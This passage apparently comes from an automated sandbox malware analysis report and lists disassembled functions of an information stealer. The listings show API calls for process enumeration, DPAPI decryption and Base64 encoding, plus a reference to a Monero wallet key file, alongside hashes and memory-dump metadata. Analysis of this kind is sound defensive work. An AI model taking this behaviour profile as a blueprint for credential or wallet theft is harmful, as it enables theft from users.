                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: N\w_$W9=$ah^{$p^|?
                                    • API String ID: 0-963267157
                                    • Opcode ID: 6cf89d782fbbc8d95ba9b65d94f5fc48b1647fd9d9c5e551ba69895f973bdb1b
                                    • Instruction ID: 0c99ae31b4e14446caa7f69cfc8dbc84ec36ac1e0d34e310c7a36cbf810ab0a3
                                    • Opcode Fuzzy Hash: 6cf89d782fbbc8d95ba9b65d94f5fc48b1647fd9d9c5e551ba69895f973bdb1b
                                    • Instruction Fuzzy Hash: 6CB2C6F360C200AFE704AE1DEC8567ABBE5EF94720F1A493DEAC5C3744E63558148697
                                    Function 00C48680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00C505B7), ref: 00C486CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00C486DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00C486F3
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • CloseHandle.KERNEL32(?), ref: 00C48761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                    • Instruction ID: f285f9a0773b6932cc473a99fc1b3f5c4a7ec5d52a59d768def4321ab737bbf7
                                    • Opcode Fuzzy Hash: 691856492f2f9075f8944520bed7a733ef792e2eb2a7b19e7d85a605ce5aed26
                                    • Instruction Fuzzy Hash: AD314B71941218ABDB24EF55DC55FEEB778FB45700F1041A9F50AA21A0DB306A89CFA2
                                    Function 00C48EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00C35184,40000001,00000000,00000000,?,00C35184), ref: 00C48EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                    • Instruction ID: 8760ac708f2ddf2c82227d93d8de90e33693bee95a0e885efb14d9215bd4b0f7
                                    • Opcode Fuzzy Hash: a88f35e6e0106c877b1378969527d7dae8f8a0e4b9e13b7ce99ef4b875ceb554
                                    • Instruction Fuzzy Hash: E5111C74200204BFDB04CFA5D884FAF33A9BF89700F149458F9198B250DB75ED89DB61
                                    Function 00C39AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00C34EEE,00000000,?), ref: 00C39B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C34EEE,00000000,00000000), ref: 00C39B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00C34EEE,00000000,?), ref: 00C39B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                    • Instruction ID: ac751f89cd04d213f82487a2b4db917d3cccc3f7119eb643b78c7756c37f8636
                                    • Opcode Fuzzy Hash: c1f169ab701c72cdcb8a2e00601244d2838eb2e2e0c37a03db03dfd5e7b25855
                                    • Instruction Fuzzy Hash: 6811A4B4240208EFEB14CF64DC95FAAB7B5FB89704F248058F9199B390C7B5AA41CB51
                                    Function 00C47980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C50E00,00000000,?), ref: 00C479B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C479B7
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00C50E00,00000000,?), ref: 00C479C4
                                    • wsprintfA.USER32 ref: 00C479F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                    • Instruction ID: e1ad326ab419198135ed0330580746a4280350571a0e87a93e9889cd631b6514
                                    • Opcode Fuzzy Hash: c304e89a678d7b8c3366babedaf38b2002c8d81b0b7d43b8bf9c3a47b49bf8cd
                                    • Instruction Fuzzy Hash: F9112AB2904118ABCB14DFCADD45BBEB7F8FB4CB11F14425AF605A2280D3395944D7B1
                                    Function 00C47A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,019DDF70,00000000,?,00C50E10,00000000,?,00000000,00000000), ref: 00C47A63
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C47A6A
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,019DDF70,00000000,?,00C50E10,00000000,?,00000000,00000000,?), ref: 00C47A7D
                                    • wsprintfA.USER32 ref: 00C47AB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                    • Instruction ID: 071a9c1ccec66b07f00f42669cda62c20f75f6ef02cd405cd0550bd38b76e58b
                                    • Opcode Fuzzy Hash: 25db1f7e01b7a9f70788d7181557f72f4d1dc3826fa1e4fdb5683da452cea892
                                    • Instruction Fuzzy Hash: F6118EB1A45218EFEB20DB55DC49FA9B778FB44721F1043AAE91AA32C0C7741A84CF52
                                    Function 01000744 Relevance: 5.4, Strings: 3, Instructions: 1605COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :!o$I#}$f-'
                                    • API String ID: 0-3078760312
                                    • Opcode ID: 615eab73f7a79fd8254370591f1693799b6d5be31131497212bb5ab537944828
                                    • Instruction ID: 2e8c1a436f4148ecb9c44fb88770a2d2a104c961965c9d4319c92f94e4f51b96
                                    • Opcode Fuzzy Hash: 615eab73f7a79fd8254370591f1693799b6d5be31131497212bb5ab537944828
                                    • Instruction Fuzzy Hash: C7B207F36082009FE304AE6DEC8567AFBE9EF94760F1A893DE6C4C3744E63558058697
                                    Function 0100DD3D Relevance: 5.3, Strings: 3, Instructions: 1563COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: [s~|$mHw$aO
                                    • API String ID: 0-2738172619
                                    • Opcode ID: 5e713d1b7270d9281bb0ee179facf7186d1efa46bcb05ee9878b0757a2c1a245
                                    • Instruction ID: 57e9d740ead38ed16c2dac4379f772a403ff7d47a3c04ddf2951a321b726396b
                                    • Opcode Fuzzy Hash: 5e713d1b7270d9281bb0ee179facf7186d1efa46bcb05ee9878b0757a2c1a245
                                    • Instruction Fuzzy Hash: FBB205F390C2109FE3046E2DEC8567AFBE9EF94320F16492DEAC4D7744EA3598418697
                                    Function 00C43720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(00C4E118,00000000,00000001,00C4E108,00000000), ref: 00C43758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00C437B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                    • Instruction ID: 9797de6c42d11033f88b4def1076d3a683dea2d38cfcd45e1a4beae4cc539ad5
                                    • Opcode Fuzzy Hash: b884813e474bc5cbd18da02f791658eec19873ef38c21540c6b191b749d71cf5
                                    • Instruction Fuzzy Hash: 35410770A40A289FDB24DB58CC94B9BB7B4BB88702F4041D9E608E72D0E771AEC5CF50
                                    Function 00C39B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C39B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00C39BA3
                                    • LocalFree.KERNEL32(?), ref: 00C39BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: b4885964b15ddbd544a95cc35874018b678d47c7fadfe448aa4d9717e2cccace
                                    • Instruction ID: 720db6339e3e3300f0811595b0cc818604a27cc78811587f7f1b714251189506
                                    • Opcode Fuzzy Hash: b4885964b15ddbd544a95cc35874018b678d47c7fadfe448aa4d9717e2cccace
                                    • Instruction Fuzzy Hash: 6E110CB8A00209DFDB04DF94D985AAEB7B9FF88300F104568E915A7350D770AE54CFA1
                                    Function 01005984 Relevance: 4.1, Strings: 2, Instructions: 1631COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3;?^$4zt'
                                    • API String ID: 0-3179944323
                                    • Opcode ID: 47124bcee734238838f01059a6be2821ae3770b84147ad5f1582509a5107c70c
                                    • Instruction ID: 0d9345a8046a2af82f533770de34e5039b8df689bd5b10a6dcaea14464d0a5c5
